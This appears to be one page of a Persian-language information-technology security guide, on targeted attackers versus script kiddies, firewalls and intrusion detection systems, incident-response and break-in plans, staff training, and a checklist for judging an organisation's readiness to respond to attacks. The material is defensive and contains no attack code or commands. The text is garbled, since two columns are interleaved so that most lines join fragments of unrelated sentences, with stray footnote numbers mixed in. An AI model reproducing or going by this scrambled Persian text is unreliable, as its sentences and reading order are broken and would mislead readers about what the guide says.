‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﻴـﺎﺯ ﺍﺳـﺖ‪.‬‬ ‫ﺣﺎﺻﻞ ﺍﺯ ﺣﺠﻢ ﺯﻳﺎﺩ ﺣﻤﻼﺕ ﺧﻮﺩ ﺍﻓﺘﺨﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑـﻪ ﻋﻠـﺖ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺶ ﺑﻪﺭﻭﺯ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻤﻜﻦ ﺍﺳـﺖ‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ‬ ‫ﺭﻭﺍﺝ ﺍﻳﻦ ﺗﻬﺪﻳﺪ‪ ،‬ﺳـﺎﺯﻧﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨـﻲ ﻳـﺎ "‪"script kiddie‬ﻫـﺎ‬ ‫ﻣﺆﺛﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﻧﻔـﻮﺫ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻧـﺪ‪.‬‬
‫ﻛﻔﺎﻳﺖ ﻛﻨﻨﺪ‪ .‬ﺍﻣـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﻫﺪﻓـﺪﺍﺭ‪ ،‬ﺍﻳـﻦ ﺭﺍﻫﺒـﺮﺍﻥ‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳـﺎﺏ‪ ٦١‬ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ‬
‫ﻫﻮﺷﻴﺎﺭ ﺳﻴﺴﺘﻢ ﻭ ﻣﺪﻳﺮﺍﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ‬ ‫ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬
‫ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ‬ ‫ﻻ ﻣﻬﺎﺟﻤﺎﻥ ﺧﺒـﺮﻩﺍﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬ ‫ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﻮﺟﻪ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺣﻤﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭﻭﻥﺳـﺎﺯﻣﺎﻧﻲ‬ ‫ﻫﺪﻑ ﺁﻧﻬﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺗﺨﺮﻳﺐ ﻭ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﻭ‬
‫ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻣﺎ ﻫﻴﭻ ﻃﺮﺣﻲ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴـﺴﺖ ﻭ ﺑـﺴﻴﺎﺭ‬ ‫ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺳﺎﺑﻘﻪ ﻭ ﺭﻭﻧﺪ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﺑﺎ ﺗﻮﺟـﻪ‬ ‫ﺑﺮﺧﻼﻑ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ﻭ "‪"script kiddie‬ﻫﺎ‪ ،‬ﻫـﺪﻑ ﺁﻧﻬـﺎ‬
‫ﺑﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻤﺮﹰﺍ ﺑﺮﺭﺳﻲ ﻛﻨـﺪ‪ .‬ﻧﻈـﺎﺭﺕ ﻣـﺴﺘﻤﺮ ﺑـﺮ‬ ‫ﻭﺍﻗﻌﹰﺎ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺳـﺖ‪ .‬ﺁﻧﻬـﺎ ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺑـﺪﻧﺒﺎﻝ‬
‫ﺩﻭﺭﻧﻤــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‪ ،‬ﻛــﺸﻒ ﻭ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔــﻮﺫ ﺭﺍ ﺳــﺎﺩﻩﺗــﺮ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﺎﻟﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ ﻛـﺎﺭﺕ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺩﺭﺑـﺎﺭﺓ ﺁﻧﭽـﻪ‬ ‫ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺟﺰﺋﻴﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ( ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺣﻴﻦ ﻭ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﻪ ﻛﺎﻫﺶ ﺁﺳﻴﺐ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ( ﻫـﺴﺘﻨﺪ ﺗـﺎ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻓـﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺭﺍ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﺧﺮﺍﺑـﻲ‬ ‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ﻳﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ‪ .‬ﺍﻳـﻦ ﺩﺳـﺘﻪ ﺍﺯ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﺪ ﻭ ﺍﻣﻜﺎﻥ ﺛﺒﺖ ﻣﻨﺎﺳﺐ ﮔﺰﺍﺭﺷﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ‬ ‫ﻣﻬﺎﺟﻤﺎﻥ ﻏﺎﻟﺒﹰﺎ ﺑﺨﻮﺑﻲ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻘﺎﻣﺎﺕ ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ‪.‬‬ ‫ﺣﻤﻠﺔ ﺍﺻﻠﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺭﺍﺟـﻊ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﻧﻮﻉ ﻣﺠﺮﻣﺎﻥ ﻛﻤﺘـﺮ‬
‫ﺗﺨﻤﻴﻦ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ‪:‬‬ ‫ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔﻮﺫ ﺁﻧـﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻞ‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬ ‫ﻣﻲﺑﺎﺷﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴـﺰ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎﻋـﺚ‬
‫ﺗﺨﺮﻳﺒﻬﺎﻱ ﺟﺪﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻳﺸﻪ ﺩﺭ ﺣﻤﻼﺕ‬
‫ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ‬ ‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﻭ ﻳـﺎ ﺳـﻬﻮﻱ‬
‫ﺩﺍﺩﻩﻫﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻏﻴﺮﺍﺧﻼﻗﻲ ﻣﻨﺘﻬﻲ ﻣﻲﺷـﻮﻧﺪ‪.‬‬ ‫ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ ﻭ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ ﺑـﻪ‬
‫ﮔﺎﻣﻬﺎﻱ ﺍﺑﺘﺪﺍﻳﻲ ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺯﻣﺎﻧﻲ ﺑﺮﺩﺍﺷﺘﻪ ﻣﻲﺷـﻮﺩ‬ ‫ﻣﺎﻫﻴﺖ ﺭﻭﺍﺑﻂ ﺁﻧﻬﺎ ﺑﺎ ﻣـﺪﻳﺮﺍﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧـﺸﺎﻥ ﺩﺭ ﻣﺤـﻴﻂ ﻛـﺎﺭ‬
‫ﻛﻪ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻳﻚ ﺗﺨﻤﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺩﺍﺧﻠـﻲ‪،‬‬
‫ﺍﻫﺪﺍﻑ‪ ،‬ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳـﻦ‬
‫‪61‬‬ ‫)‪Intrusion Detection Systems (IDSs‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤٠‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ؛‬ ‫‪o‬‬ ‫ﻋﻨﺎﺻﺮ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴـﻞ ﺷـﺪﻧﺪ‪ ،‬ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻧﻴـﺰ‬
‫ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺣﻤﻠﻪ؛‬ ‫‪o‬‬ ‫ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﺭﻭﺍﻟﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﻪ ﻳﺎﺑﺪ‪.‬‬
‫ﺍﻋﻼﻡ ﺣﻤﻠﻪ ﺑﻪ ﻣﺪﻳﺮﺕ ﺍﺭﺷﺪ؛‬ ‫‪o‬‬
‫ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺣﻮﺯﻩﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺫﻳـﻞ‬
‫ﺛﺒﺖ ﻭﻗﺎﻳﻊ؛‬ ‫‪o‬‬
‫‪٦٤‬‬
‫ﺑﺎﺷﺪ‪:‬‬
‫ﺗﻬﻴﺔ ﺗﺼﺎﻭﻳﺮ ﺁﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ؛‬ ‫‪o‬‬
‫ﺗﻤﺎﺱ ﺑﺎ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ‬ ‫‪o‬‬ ‫ﺩﺍﻧﺴﺘﻦ ﺯﻣﺎﻧﻲ ﻛﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻳﺪ ‪ -‬ﺍﺯ ﻃﺮﻳﻖ‬ ‫•‬

‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪٦٥‬؛‬ ‫ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻛــﺸﻒ ﺗﻬــﺎﺟﻢ ﻭ ﻫﻮﺷــﻴﺎﺭﻱ‬


‫ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻢ؛‬ ‫‪o‬‬ ‫ﺩﺍﺧﻠﻲ‪.‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ؛ ﻭ‬ ‫‪o‬‬ ‫ﻓﺮﺍﻫﻢ ﺳﺎﺧﺘﻦ ﺳﻨﺎﺭﻳﻮﻱ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜـﻦ ‪ -‬ﺗﻔﻜـﺮ‬ ‫•‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﻭﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺮﺩ‪.‬‬ ‫‪o‬‬ ‫ﺩﺭﺑﺎﺭﺓ ﺗﺄﺛﻴﺮﺍﺕ ﻣﻀﺎﻋﻔﻲ ﻛـﻪ ﻧﻘـﺾ ﺍﻣﻨﻴـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺍﮔﺮ ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ‬ ‫ﺑﺮﺍﻳﺘﺎﻥ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﺠﺪﺩﹰﺍ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﻭ ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﺑﻮﺩﺟﻪ ﻭ ﺗـﺪﺍﺭﻛﺎﺕ ﺑـﻪ ﺷـﻤﺎ‬ ‫ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻣﻜﺘﻮﺏ ﺑﺮﺍﻱ ﺛﺒـﺖ ﻭﻗـﺎﻳﻊ ﺍﻣﻨﻴﺘـﻲ‬ ‫•‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺩﺭ ﺍﺭﺯﻳـﺎﺑﻲ ﺳـﺎﺯﻣﺎﻥ‪،‬‬ ‫)ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﻧﻔﻮﺫ‪ - (٦٢‬ﺍﻳﻦ ﺳﻨﺪ ﻛﺘﺒﻲ ﺑﻪ ﺗﺤﻠﻴﻞ ﻭﻗﺎﻳﻊ‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳﺆﺍﻻﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺷـﻤﺎ ﺩﺭ‬ ‫ﻣﻨﻔﺮﺩ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﻣﻮﻓـﻖ ﺩﺭ ﺁﻳﻨـﺪﻩ ﻛﻤـﻚ‬
‫ﺗﻌﺮﻳﻒ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﻗﻮﺕ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﻛﻤـﻚ ﻛﻨﻨـﺪ‪ .‬ﻳـﻚ‬ ‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﻧﻤﻮﻧﻪ ﻛﻪ ﺑﺮ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣـﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗﻬـﺎﺟﻢ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻳﻚ ﻣﺘﺨﺼﺺ ﺩﺭﺻـﻮﺭﺕ ﻧﻴـﺎﺯ ‪ -‬ﺑـﺮ ﻣﺒﻨـﺎﻱ‬ ‫•‬
‫ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﺭﺍ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻲﺑﻴﻨﻴﺪ‪:‬‬
‫ﺭﺧﺪﺍﺩﻫﺎ ﻳﺎ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﺔ ﻣـﺸﺎﻭﺭﺓ ﺩﻭﺭﻩﺍﻱ‪ .‬ﺍﺯ‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺭﺧﺪﺍﺩ‪ ،‬ﻃﺮﺣﻬﺎﻱ ﺗـﺮﻣﻴﻢ ﻭ ﺳـﺮﻣﺎﻳﺔ‬ ‫ﺍﺳﺘﺨﺪﺍﻡ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺧﻮﺩﺧﻮﺍﻧﺪﻩ )ﻛﺴﺎﻧﻴﻜﻪ ﻣـﺪﻋﻲ ﻧﻔـﻮﺫﮔﺮﻱ‬
‫ﻣﻮﺭﺩ ﻧﻴﺎﺯ‪:‬‬ ‫ﻫﺴﺘﻨﺪ( ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﻣﺒﺤـﺚ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺯ ﻃﺮﻳـﻖ‬
‫‪٦٣‬‬
‫ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﭘﺎﺳـﺨﮕﻮﻳﻲ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻭﺟـﻮﺩ‬ ‫‪o‬‬ ‫ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﺑﺨﺶ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺍﺭﻧﺪ؟‬ ‫ﻓﺮﺍﻫﻢ ﻧﻤﻮﺩﻥ ﺁﻣﻮﺯﺵ ﻻﺯﻡ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻓﻨﻲ ﻭ ﺳـﺎﻳﺮ‬ ‫•‬
‫ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﻗﺎﺑﻞ ﻓﻬﻢ ﻭ ﺑﻪ ﺭﻭﺯ ﻫﺴﺘﻨﺪ؟‬ ‫‪o‬‬ ‫ﻛﺎﺭﻣﻨﺪﺍﻥ ‪ -‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻘﺼﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺎﺷﻲ ﺍﺯ ﻛﻤﺒﻮﺩ‬
‫ﺁﻳﺎ ﻃﺮﺣﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺁﺛﺎﺭ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‬ ‫‪o‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﻣـﺴﺎﺋﻞ‬
‫ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ؟‬ ‫ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺩﺭ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻧﺤﻮﺓ‬
‫ﺁﻳﺎ ﺳﺮﻣﺎﻳﺔ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ‬ ‫‪o‬‬ ‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﻣﻘﺎﺑﻞ ﺭﺧﺪﺍﺩ ﺗﺨﺼﻴﺺ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ؟‬
‫ﺗﻌﻴﻴﻦ ﻳـﻚ ﻧﻘﻄـﺔ ﺗﻤـﺎﺱ ‪ -‬ﺍﻳـﻦ ﻓـﺮﺩ ﺑﺎﻳـﺪ ﺩﺭ ﺣـﻮﺯﺓ‬ ‫•‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺪﻳﺮﻳﺖ‪:‬‬ ‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺘﺨﺼﺺ ﺑﺎﺷﺪ ﻭ ﻭﻗﺎﻳﻊ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ‬
‫‪ o‬ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ‬ ‫ﺍﻋﻀﺎﻱ ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﮔﺰﺍﺭﺵ ﺩﻫﺪ‪.‬‬
‫ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺗﻤﺎﻡ ﻃﻮﻝ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﻭ ﻫـﺮ‬ ‫ﺩﺭﻙ ﻭ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺍﻫﺪﺍﻑ ‪ -‬ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﻪ ﻳﺎ ﺑﺮﺧـﻲ‬ ‫•‬
‫ﻫﻔﺖ ﺭﻭﺯ ﻫﻔﺘﻪ ﻫﺴﺘﻨﺪ؟‬ ‫ﺍﺯ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﻣﻲﺷﻮﺩ‪:‬‬
‫‪ o‬ﺍﮔﺮ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ‪ ،‬ﺁﻳﺎ ﺭﺍﻫﻲ‬
‫ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟‬
‫‪62‬‬ ‫‪Break-In Plan‬‬
‫ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻮﺳـﻂ ﻭ ﺑـﺰﺭﮒ ﻋﻤﻠـﻲ ﺍﺳـﺖ ﻭ‬ ‫‪۶۳‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻳـﺸﺎﻥ ﻭﺍﺑـﺴﺘﮕﻲ‬
‫ﺯﻳﺎﺩﻱ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭ ﻫﺪﻓﺸﺎﻥ ﺑﺎﺯﺍﺭ ﻓﻨﻲ ﭘﻴﺸﺮﻓﺘﻪ ﺍﺳـﺖ‪ .‬ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺩﻭﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﻟﻘﻮﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻭﺟﻬﺔ ﻓﻨﻲ ﺷﺮﻛﺖ ﻭ‬
‫ﺍﺳﺘﺤﻜﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻥ ﻧﻈﺮﺍﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ ﻛﻪ ﺑﺎﻋـﺚ‬
‫‪64‬‬ ‫‪Snapshots‬‬
